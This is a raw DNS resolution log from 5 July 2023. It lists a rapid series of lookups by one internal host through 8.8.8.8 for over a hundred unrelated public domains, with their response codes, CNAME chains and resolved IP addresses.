                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.425782919 CEST8.8.8.8192.168.2.60x5041Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.463260889 CEST8.8.8.8192.168.2.60xe838No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.477493048 CEST8.8.8.8192.168.2.60x2485No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.518888950 CEST8.8.8.8192.168.2.60x7dc4No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.518888950 CEST8.8.8.8192.168.2.60x7dc4No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.518888950 CEST8.8.8.8192.168.2.60x7dc4No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.555125952 CEST8.8.8.8192.168.2.60x7ab6No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.738571882 CEST8.8.8.8192.168.2.60x6713No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.764319897 CEST8.8.8.8192.168.2.60x41e4No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.781176090 CEST8.8.8.8192.168.2.60xf02cNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.851150036 CEST8.8.8.8192.168.2.60xed32Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.872369051 CEST8.8.8.8192.168.2.60x5c8eServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.980992079 CEST8.8.8.8192.168.2.60x31e5Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.184998989 CEST8.8.8.8192.168.2.60xfe70No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.184998989 CEST8.8.8.8192.168.2.60xfe70No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.184998989 CEST8.8.8.8192.168.2.60xfe70No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.239518881 CEST8.8.8.8192.168.2.60xe9faServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.274189949 CEST8.8.8.8192.168.2.60xfb0dNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.469763994 CEST8.8.8.8192.168.2.60x6beServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.621670008 CEST8.8.8.8192.168.2.60xcff6No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.703432083 CEST8.8.8.8192.168.2.60xda74No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.703432083 CEST8.8.8.8192.168.2.60xda74No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.703432083 CEST8.8.8.8192.168.2.60xda74No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.797532082 CEST8.8.8.8192.168.2.60x749dNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.804728031 CEST8.8.8.8192.168.2.60xbaefNo error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.819766998 CEST8.8.8.8192.168.2.60xbaffNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.943958998 CEST8.8.8.8192.168.2.60xdaeaNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.943958998 CEST8.8.8.8192.168.2.60xdaeaNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.967375040 CEST8.8.8.8192.168.2.60xc31aNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.975729942 CEST8.8.8.8192.168.2.60xd2adNo error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.976504087 CEST8.8.8.8192.168.2.60xf190No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.987806082 CEST8.8.8.8192.168.2.60xf72bName error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.070988894 CEST8.8.8.8192.168.2.60x7f7eServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.107772112 CEST8.8.8.8192.168.2.60xd6b5No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.119515896 CEST8.8.8.8192.168.2.60xe78aNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.215034962 CEST8.8.8.8192.168.2.60xefebNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.229867935 CEST8.8.8.8192.168.2.60xa501No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.268136978 CEST8.8.8.8192.168.2.60x41bfNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.269470930 CEST8.8.8.8192.168.2.60x66dNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.272878885 CEST8.8.8.8192.168.2.60xa97dNo error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.272878885 CEST8.8.8.8192.168.2.60xa97dNo error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.277308941 CEST8.8.8.8192.168.2.60x66c2No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.315776110 CEST8.8.8.8192.168.2.60xb8e0No error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.377175093 CEST8.8.8.8192.168.2.60x3b4No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.394057989 CEST8.8.8.8192.168.2.60x60a4No error (0)vivastay.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.394057989 CEST8.8.8.8192.168.2.60x60a4No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.394057989 CEST8.8.8.8192.168.2.60x60a4No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.394057989 CEST8.8.8.8192.168.2.60x60a4No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.476279974 CEST8.8.8.8192.168.2.60x44ffNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.476279974 CEST8.8.8.8192.168.2.60x44ffNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.499191046 CEST8.8.8.8192.168.2.60x82a2No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.499191046 CEST8.8.8.8192.168.2.60x82a2No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.499191046 CEST8.8.8.8192.168.2.60x82a2No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.570014954 CEST8.8.8.8192.168.2.60xb0c3Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.577215910 CEST8.8.8.8192.168.2.60x407eNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.578371048 CEST8.8.8.8192.168.2.60x602dNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.585216999 CEST8.8.8.8192.168.2.60xcfcServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.666460991 CEST8.8.8.8192.168.2.60xbbf6No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.685802937 CEST8.8.8.8192.168.2.60x271eNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.692250013 CEST8.8.8.8192.168.2.60x678eNo error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.692449093 CEST8.8.8.8192.168.2.60x2b6bNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.692449093 CEST8.8.8.8192.168.2.60x2b6bNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.692449093 CEST8.8.8.8192.168.2.60x2b6bNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.692449093 CEST8.8.8.8192.168.2.60x2b6bNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.699750900 CEST8.8.8.8192.168.2.60x7b1cNo error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.713751078 CEST8.8.8.8192.168.2.60x79bdNo error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.734440088 CEST8.8.8.8192.168.2.60xe9faServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.767400026 CEST8.8.8.8192.168.2.60x69aNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.767400026 CEST8.8.8.8192.168.2.60x69aNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.767400026 CEST8.8.8.8192.168.2.60x69aNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.767400026 CEST8.8.8.8192.168.2.60x69aNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.786181927 CEST8.8.8.8192.168.2.60x3e58No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.786181927 CEST8.8.8.8192.168.2.60x3e58No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.816248894 CEST8.8.8.8192.168.2.60xa7f5Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.853544950 CEST8.8.8.8192.168.2.60xbcc8No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.987517118 CEST8.8.8.8192.168.2.60xed32Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.355031013 CEST8.8.8.8192.168.2.60xb4ddNo error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.393718004 CEST8.8.8.8192.168.2.60xc83Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.451070070 CEST8.8.8.8192.168.2.60x99a6No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.467230082 CEST8.8.8.8192.168.2.60x63a8Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.491235971 CEST8.8.8.8192.168.2.60xc2c3Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.525484085 CEST8.8.8.8192.168.2.60x453eNo error (0)dspears.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.525484085 CEST8.8.8.8192.168.2.60x453eNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.525484085 CEST8.8.8.8192.168.2.60x453eNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.525484085 CEST8.8.8.8192.168.2.60x453eNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.562772036 CEST8.8.8.8192.168.2.60x6137No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.600377083 CEST8.8.8.8192.168.2.60x2d95No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.662719011 CEST8.8.8.8192.168.2.60xbcc1Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.662868023 CEST8.8.8.8192.168.2.60x51beNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.664247990 CEST8.8.8.8192.168.2.60x2c07No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.673566103 CEST8.8.8.8192.168.2.60x8b0aNo error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.673566103 CEST8.8.8.8192.168.2.60x8b0aNo error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.699600935 CEST8.8.8.8192.168.2.60xe532No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.699600935 CEST8.8.8.8192.168.2.60xe532No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.741357088 CEST8.8.8.8192.168.2.60xadddName error (3)mjrcpas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.749663115 CEST8.8.8.8192.168.2.60x9cacNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.766990900 CEST8.8.8.8192.168.2.60xb7c5Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.768562078 CEST8.8.8.8192.168.2.60x8030No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.775818110 CEST8.8.8.8192.168.2.60x6cdeNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.849333048 CEST8.8.8.8192.168.2.60x861eNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.851531982 CEST8.8.8.8192.168.2.60xd73aNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.853965044 CEST8.8.8.8192.168.2.60xa689No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.853965044 CEST8.8.8.8192.168.2.60xa689No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.857198000 CEST8.8.8.8192.168.2.60x4cc9No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.865969896 CEST8.8.8.8192.168.2.60x8f0No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.879367113 CEST8.8.8.8192.168.2.60xef70No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.982826948 CEST8.8.8.8192.168.2.60xa0caNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.982826948 CEST8.8.8.8192.168.2.60xa0caNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.982826948 CEST8.8.8.8192.168.2.60xa0caNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.986330032 CEST8.8.8.8192.168.2.60x2360No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.986330032 CEST8.8.8.8192.168.2.60x2360No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.986330032 CEST8.8.8.8192.168.2.60x2360No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.986438036 CEST8.8.8.8192.168.2.60x5360No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.986438036 CEST8.8.8.8192.168.2.60x5360No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.986438036 CEST8.8.8.8192.168.2.60x5360No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.986438036 CEST8.8.8.8192.168.2.60x5360No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.988115072 CEST8.8.8.8192.168.2.60xa375No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.053431988 CEST8.8.8.8192.168.2.60x5933No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.053431988 CEST8.8.8.8192.168.2.60x5933No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.105767012 CEST8.8.8.8192.168.2.60xf5daNo error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.108716965 CEST8.8.8.8192.168.2.60x50b1No error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.158955097 CEST8.8.8.8192.168.2.60x48c3No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.190764904 CEST8.8.8.8192.168.2.60xef05No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.238457918 CEST8.8.8.8192.168.2.60xf1d7No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.242985010 CEST8.8.8.8192.168.2.60xb41eNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.244685888 CEST8.8.8.8192.168.2.60x76d6No error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.253808975 CEST8.8.8.8192.168.2.60xc3f0No error (0)dspears.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.253808975 CEST8.8.8.8192.168.2.60xc3f0No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.253808975 CEST8.8.8.8192.168.2.60xc3f0No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.253808975 CEST8.8.8.8192.168.2.60xc3f0No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.294276953 CEST8.8.8.8192.168.2.60xc800No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.336463928 CEST8.8.8.8192.168.2.60x52acServer failure (2)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.408869982 CEST8.8.8.8192.168.2.60xa5deNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.423341036 CEST8.8.8.8192.168.2.60xcb98No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.466797113 CEST8.8.8.8192.168.2.60x5931Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.509402990 CEST8.8.8.8192.168.2.60xd04bNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.509402990 CEST8.8.8.8192.168.2.60xd04bNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.515587091 CEST8.8.8.8192.168.2.60xb9faNo error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.524480104 CEST8.8.8.8192.168.2.60xb04eServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.640444040 CEST8.8.8.8192.168.2.60x1d79No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.704819918 CEST8.8.8.8192.168.2.60xf9e0No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.903156042 CEST8.8.8.8192.168.2.60x7329Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.933398962 CEST8.8.8.8192.168.2.60xaa93Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.934386015 CEST8.8.8.8192.168.2.60xf00dNo error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:04.987502098 CEST8.8.8.8192.168.2.60x9477No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.012562990 CEST8.8.8.8192.168.2.60x9c79No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.012562990 CEST8.8.8.8192.168.2.60x9c79No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.245635986 CEST8.8.8.8192.168.2.60x22d1No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.266077995 CEST8.8.8.8192.168.2.60xea6fNo error (0)envogen.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.266077995 CEST8.8.8.8192.168.2.60xea6fNo error (0)envogen.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.317960978 CEST8.8.8.8192.168.2.60x2a64No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.542828083 CEST8.8.8.8192.168.2.60xe2eNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.560661077 CEST8.8.8.8192.168.2.60x1ccaNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.618865967 CEST8.8.8.8192.168.2.60x1a62Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.626666069 CEST8.8.8.8192.168.2.60x7991No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.626666069 CEST8.8.8.8192.168.2.60x7991No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.643575907 CEST8.8.8.8192.168.2.60x7b92No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.652010918 CEST8.8.8.8192.168.2.60xdf41No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:05.660892010 CEST8.8.8.8192.168.2.60x3976No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
